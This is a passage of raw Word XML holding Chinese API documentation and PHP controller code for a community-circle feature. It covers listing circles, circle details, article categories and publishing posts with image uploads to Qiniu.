    <w:p w14:paraId="13233A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$my_circles['data'][$key]['hide'] = is_null($my_circle['hide']) ? 0 : $my_circle['hide'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4985F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$my_circles['data'][$key]['article_num'] = is_null($my_circle['article_num']) ? 0 : </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$my_circle['article_num'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B72E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$my_circles['data'][$key]['follower_num'] = is_null($my_circle['follower_num']) ? 0 : $my_circle['follower_num'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72841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$my_circles['data'][$key]['type'] = Db::name('circle_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFB66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$my_circle['type_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8D57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-&gt;value('title');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B59E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CA4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5558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$my_circles['data'] = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3FC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C74F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json($my_circles);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F316E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666C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64B0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/api/circle/index </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取社区列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCEFF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获取社区列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3967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848F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36D69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478342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type_id       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A70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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F86D9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per_page      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035C3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用户社区列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B6C0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用户社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151090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        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377CF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用户社区描述说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA4B5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         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区所属分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD9F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article_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50671C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follow_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区关注人数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAB18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当前用户是否已关注社区：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24C781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14BDC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4F4EF6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63AE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4233C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8A7F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544C43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6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCA3C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input('param.type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45873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($type_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAF47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5556C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-&gt;where('type_id', $type_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE879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7D9B05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3F22F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3CAAA5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98960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264109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2820BE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0B3E0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66B330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4F5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1606D2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1ED002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-&gt;paginate($per_page, false, ['page' =&gt; $page,])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFE63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363AA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(count($circles['data']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E51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($circles['data'] as $key =&gt; $circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292A18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(!$circle['img']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEB6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$circles['data'][$key]['img'] = '/public/style/index/member/img/default_circle_logo_52x52.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FECE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54CC6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$circles['data'][$key]['img'] = _imgUrl() . $circle['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D775A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E6C7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$circles['data'][$key]['type'] = Db::name('circle_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8FB2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$circle['type_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AE5A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-&gt;value('title');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E573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$circles['data'][$key]['follow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D929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C792B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 = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8DC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$circle['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7222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2193A6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386283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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36622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 &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4AAF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$circles['data'][$key]['follow'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4876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E81A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4FF2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2889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42B2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$circles['data'] = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D2B7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CD29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json($circles);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B0B6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5B02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882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/api/circle/info </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取社区详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270BF4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获取社区详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A46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EAB8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50228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1EDD3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circle_id     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28583B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用户社区详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEA51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用户社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473CD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        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046738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用户社区描述说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F06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article_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5009B1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follow_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区关注人数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF3DD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当前用户是否已关注社区：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0C7F82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12C56E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3B22B4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74C3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4371C7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FEA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$circle_id = input('param.circle_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E0F1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 = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15907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-&gt;where('id', $circle_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D519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43D0F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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5589E9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(!$circle['img']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D5F2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$circle['img'] = '/public/style/index/member/img/default_circle_logo_52x52.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B1E2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B504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$circle['img'] = _imgUrl() . $circle['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32720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62AA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$article_num = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5020E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$circle['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185BE1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7F22F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$circle['article_num'] = $article_num;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410579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$follower_num = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0D05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$circle['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A09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1AE67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789C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$circle['follower_num'] = $follower_num;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA304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($article_num != $circle['article_num'] || $follower_num != $circle['follower_num']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF5EA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$circle['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472028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37C51A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'article_num' =&gt; $article_num,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9221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'follower_num' =&gt; $follower_num,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442A8D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7E97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8724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299CA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 = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E2CB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$circle['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAA7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396B32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60787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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094DC6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 &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C5AB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 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455A60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7289B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 = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE17E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B32D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8D4A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 = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A5FC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DB92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48B4D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F3000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该用户社区不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F81A5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1BB2B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4AE8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C31E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json($circle);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7E6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6145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B0E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/api/circle/create_article_type </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建社区动态分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9FA0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创建社区动态分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD0B6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54FD5D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7005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02C010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title     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态分类名称（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D452A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社区动态分类描述说明（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017C7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社区动态分类创建成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202D18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社区动态分类创建失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1F0F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2B962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8635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create_article_type()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ADA6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E630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0FD76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62A79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请先登录账号，然后创建社区动态分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3686AA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6738C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1EE7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B553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input('param.title', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4CA4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($data['title'] == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2661E4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48839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社区动态分类名称不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490C06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D6D1A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9E4C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FA3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$circle_type = Db::name('circle_article_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D20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$data['title'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732F26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72DDAF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(!empty($circle_article_type)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9E71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7759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同名社区动态分类已存在，请更换社区动态分类名称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C01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203,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8962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8318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497B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input('param.content', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D008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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0957A8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02F0AD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$circle_article_type_id = Db::name('circle_article_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662ACD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132D6B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($circle_article_type_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5070EA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6E11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社区动态分类创建成功，请等待后台审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54700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803F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19FD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F141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社区动态分类创建失败，请稍后重试</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501F4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5B8F17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8A30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668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AF6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/api/circle/article_types </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取社区动态分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EB21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获取社区动态分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21777D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00D02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E195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{Json} result        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3F0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社区动态分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A402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       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态分类标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291F93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社区动态分类描述说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B687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circle_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A6E9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546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article_types()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AD2D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B08D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$circle_article_types = Db::name('circle_article_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1730C1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446B55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4C2F0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(count($circle_article_types) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258C1F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($circle_article_types as $key =&gt; $circle_article_type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B946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$circle_article_types[$key]['article_num'] = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5633E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-&gt;where('type_id', $circle_article_type['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202711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5CFF6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247E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0C7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json($circle_article_types);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762172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1F7A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B561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/api/circle/publish_article </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布社区动态｜用户动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7CB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发布社区动态｜用户动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F830B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15545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F6149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124A3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circle_id   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填：为空时，则为用户动态）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D12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社区动态内容（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BD0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description </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态内容描述（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74711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{File} images        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多图列表（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AB61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社区动态｜用户动态创建成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CE19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社区动态｜用户动态创建失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C4DC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453CD7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185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publish_article()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229152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0832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219382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33034A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057EC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82796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请先登录账号，然后发布社区动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BF1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2B765D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FD9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3213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$data['circle_id'] = input('param.circle_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112F3D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($data['circle_id'] == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5071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51ECE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用户社区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59E616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AF9A6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758E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EFB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$circle = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15767F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$data['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E12E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601C2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$data['type_id'] = input('param.type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8C2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input('param.title', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FCD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($data['circle_id'] != '' &amp;&amp; $data['type_id'] != '' &amp;&amp; $data['title'] != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD5D2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 = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E6ED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$data['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213C84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-&gt;where('type_id', $data['type_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AA2B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$data['title'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004139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13E5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(!empty($circle_article)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F695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8912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同名的社区动态已存在，请更换动态标题</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738DC9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203,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218A4A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6718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2DE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713C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input('param.content', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552E67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input('param.description', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705173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$data['click'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBC4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$data['zan_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C826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$data['cai_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A845D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$data['ping_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F2E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$data['share_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CABED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($data['circle_id'] != '' &amp;&amp; $data['type_id'] != '') { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD10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2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106597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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24716E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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9B9C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D15A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547DA7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($data['circle_id'] != '' &amp;&amp; $data['type_id'] != '' &amp;&amp; $data['title'] != '' &amp;&amp; $data['description'] == '' &amp;&amp; $data['content']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73832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substr(strip_tags($data['content']), 0, 70) . '...';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09208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15F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$image_keys = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0330F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(request()-&gt;file('images')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BC0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$files = request()-&gt;file('images');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317667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($files as $file) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265B1E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10B38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(!$filePath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BC53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DDF8C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非法操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241C0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639D37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6E6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7145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$extension = pathinfo($file-&gt;getInfo('name'), PATHINFO_EXTENSION); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288FDB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$extensions = ['jpg', 'png', 'gif', 'jpeg', 'JPEG', 'JPG', 'GIF', 'PNG'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D685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(!in_array($extension, $extensions)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC7FF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9753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646094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'errcode' =&gt; 202,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683D9B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7E2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BC7E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substr(md5($file-&gt;getRealPath()), 0, 5) . date('YmdHis') . rand(100, 999999) . '.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F54B9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704EA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Db::name('member_config')-&gt;where('type', 'sdkQiniu')-&gt;where('name', 'qiniuAk')-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13803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Db::name('member_config')-&gt;where('type', 'sdkQiniu')-&gt;where('name', 'qiniuSk')-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399623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4FD225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Db::name('member_config')-&gt;where('type', 'sdkQiniu')-&gt;where('name', 'qiniuBucket')-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0729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Db::name('member_config')-&gt;where('type', 'sdkQiniu')-&gt;where('name', 'qiniuUrl')-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D20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19A0B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44C71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23C899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61B9C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02F88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$err,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A88FD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46CEE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F7CF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AD15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$image_keys[] = $ret['key'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6A79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CC7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1656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0E74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 = join(',', $image_keys);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60988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$circle_article_id = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DED6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3DD8BE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($circle_article_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F087D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($data['circle_id'] != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BD3A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w:t>
      </w:r>
    </w:p>
